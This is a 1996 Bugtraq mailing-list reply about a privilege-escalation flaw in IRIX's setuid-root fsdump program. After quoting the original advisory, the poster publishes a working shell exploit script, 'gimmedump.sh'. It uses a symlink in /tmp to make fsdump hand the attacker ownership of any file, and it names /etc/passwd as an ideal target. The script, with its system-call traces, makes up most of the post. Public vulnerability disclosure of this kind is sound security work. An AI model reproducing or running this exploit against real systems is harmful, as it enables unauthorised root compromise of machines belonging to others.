[3725] in bugtraq
Re: Irix: more suid fun/exploits
daemon@ATHENA.MIT.EDU (Jaechul Choe)
Mon Dec 2 11:40:44 1996
Date: Tue, 3 Dec 1996 00:03:54 +0900
Reply-To: Jaechul Choe <poison@cosmos.kaist.ac.kr>
From: Jaechul Choe <poison@cosmos.kaist.ac.kr>
X-To: volobuev@t1.chem.umn.edu
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
In-Reply-To: <Pine.A41.3.95.961128044315.13692A-100000@t1.chem.umn.edu> from
"Yuri Volobuev" at Nov 28, 96 05:55:38 am
> ABSTRACT
>
> /var/rfindd/fsdump is owned by root, has suid bit set by default and has
> bugs. It allows local users to create zero-length files anywhere on the
> system. If the file already exists, content is lost. With little work, it
> can be converted to root compromise. 5.3 is is affected, 6.2 doesn't seem to
> have it, at least not on a standard installation.
>
Exploiting fsdump just one time you can change the owner of any file
to yourself. Didn't you see the program changes the owner of .pag & .dir files
to the user running it?
I've found the bug several weeks ago and now post a lame exploit script
that was put aside.
IRIX 6.2's fsdump was vulnerable also. Is it safe from the zero length
.lock file creation?
-------)<--------------------------------------------------------)<-------
#!/bin/sh
# gimmedump.sh
#
# This exploits the serious vulnerability in IRIX's fsdump(1M) program
# and attempts to change the owner of an arbitrary file to yourself.
# (You know /etc/passwd is an excellent target.)
# Tested on both IRIX 5.3 and IRIX64 6.2
# I think this bug may be exploited on any version of IRIX machines
# currently running.
# Here are some system call traces on the program, which show what
# the problem is:
#
# 379mS getuid() = 1128 euid=0
# 379mS getuid() = 1128 euid=0
# 379mS getuid() = 1128 euid=0
# 379mS getgid() = 20 egid=20
# 379mS chdir(/usr/var/tmp/) OK
# 380mS chmod(gimme, 0644) errno = 2 (No such file or directory)
# 380mS chown(gimme, 1128, 20) errno = 2 (No such file or directory)
# 380mS chmod(fsdump.pag, 0644) OK
# 380mS chown(fsdump.pag, 1128, 20) OK
# 380mS chmod(fsdump.dir, 0644) OK
# 381mS chown(fsdump.dir, 1128, 20) OK
#
# 1996 10.23 Jaechul Choe, CS Dept. in KAIST, Republic of Korea
# poison@worak.kaist.ac.kr
PROG="`basename $0`"
if [ $# -ne 1 ]; then
echo "Usage: $PROG <target>"
exit 1
fi
if [ ! -f /var/rfindd/fsdump ]; then
echo "fsdump doesn't exist! - exiting"
exit 1
fi
cd /tmp
ln -s $1 fsdump.dir
echo "Be patient! It will take some time to run."
echo "If you can't really wait, strike Ctrl-Z and see to the target file.\n"
/var/rfindd/fsdump -Fgimme /
echo "\nDone. Here is the result."
ls -al $1
rm -f fsdump.dir fsdump.pag gimme
exit 0
